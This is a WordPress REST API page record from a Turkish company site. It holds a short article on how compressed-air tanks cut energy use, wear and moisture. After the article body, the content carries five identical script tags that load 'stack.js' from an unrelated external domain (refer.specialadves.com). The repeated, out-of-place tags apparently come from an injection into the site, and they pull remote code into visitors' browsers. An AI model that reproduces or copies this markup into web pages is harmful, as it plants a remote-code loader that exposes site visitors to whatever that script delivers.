{"id":1277,"date":"2021-04-15T10:00:23","date_gmt":"2021-04-15T07:00:23","guid":{"rendered":"http:\/\/gensalimited.com.tr\/index.php\/hava-tanklari-nasil-kullanilir-ve-secilir-copy\/"},"modified":"2021-04-15T10:03:35","modified_gmt":"2021-04-15T07:03:35","slug":"hava-tanki-size-nasil-tasarruf-ettirir","status":"publish","type":"page","link":"https:\/\/gensalimited.com.tr\/index.php\/hava-tanki-size-nasil-tasarruf-ettirir\/","title":{"rendered":"Hava tank\u0131 size nas\u0131l tasarruf ettirir?"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;829&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]E\u011fer pistonlu kompres\u00f6r kullan\u0131yorsan\u0131z, kompres\u00f6r\u00fcn\u00fcz\u00fcn tahliye hatt\u0131ndan gelen titre\u015fimleri s\u00f6n\u00fcmleyerek hava ak\u0131\u015f\u0131n\u0131 stabil bir hale getirir. Bu sayede kulland\u0131\u011f\u0131n\u0131z ekipmana d\u00fczg\u00fcn bir hava\u00a0 verilmesini sa\u011flar. \u0130stenmeyen bas\u0131n\u00e7 art\u0131\u015flar\u0131 nedeniyle siz ve sisteminiz zarar g\u00f6rmemi\u015f olur.<\/p>\n<p>Hava tank\u0131nda istenilen miktarda havay\u0131 depolayabildi\u011fimiz i\u00e7in kompres\u00f6r\u00fcn a\u015f\u0131r\u0131 d\u00f6ng\u00fcs\u00fc engellenmi\u015f olur. Bu sayede elektrik t\u00fcketimini azaltm\u0131\u015f oluruz.<\/p>\n<p>Ani bas\u0131n\u00e7 de\u011fi\u015fimlerini s\u00f6n\u00fcmlemenin bir di\u011fer etkisi de kulland\u0131\u011f\u0131n\u0131z cihazlar\u0131n korozyona u\u011frama oran\u0131n\u0131 en aza indirerek, kullan\u0131m \u00f6m\u00fcrlerini en y\u00fckse\u011fe \u00e7\u0131karm\u0131\u015f oluruz.<\/p>\n<p>Hava tanklar\u0131n\u0131n kullan\u0131lmas\u0131n\u0131n bir di\u011fer sebebi de kullan\u0131c\u0131n\u0131n anl\u0131k hava talebini kar\u015f\u0131lamakt\u0131r. Boyutland\u0131rma do\u011fru ise hava talepleri daha rahat kar\u015f\u0131lanabilir. Ayr\u0131ca bu sayede al\u0131nacak kompres\u00f6r\u00fcn hacmi de k\u00fc\u00e7\u00fclt\u00fclebilece\u011fi i\u00e7in bu tarafta da tasarruf sa\u011flanm\u0131\u015f olur.<\/p>\n<p>Hava\u00a0 tank\u0131n\u0131n \u0131s\u0131 e\u015fanj\u00f6r\u00fc i\u015flevi, hava kurutucunuzun verimlili\u011fini art\u0131rmaya yard\u0131mc\u0131 olur. Hava al\u0131c\u0131 tanktan yava\u015f\u00e7a ge\u00e7erken so\u011fur. Daha so\u011fuk hava, \u0131l\u0131k hava kadar nem tutamaz, bu nedenle fazla nem yo\u011funla\u015f\u0131r ve havadan s\u0131v\u0131 gibi d\u0131\u015far\u0131 d\u00fc\u015fer. Su, tank\u0131n alt\u0131ndaki bir vanadan d\u0131\u015far\u0131 akar. \u00d6nceden bir miktar nemi gidererek, hava al\u0131c\u0131 tank\u0131 hava kurutucunun yapmas\u0131 gereken i\u015f miktar\u0131n\u0131 azalt\u0131r. Bu iyile\u015ftirilmi\u015f verimlilik, sisteminiz i\u00e7in ek enerji tasarrufu anlam\u0131na gelir.[\/vc_column_text][\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;829&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]E\u011fer pistonlu kompres\u00f6r kullan\u0131yorsan\u0131z, kompres\u00f6r\u00fcn\u00fcz\u00fcn tahliye hatt\u0131ndan gelen titre\u015fimleri s\u00f6n\u00fcmleyerek hava ak\u0131\u015f\u0131n\u0131 stabil bir hale getirir. Bu sayede kulland\u0131\u011f\u0131n\u0131z ekipmana&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-1277","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/1277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=1277"}],"version-history":[{"count":2,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/1277\/revisions"}],"predecessor-version":[{"id":1279,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/1277\/revisions\/1279"}],"wp:attachment":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=1277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}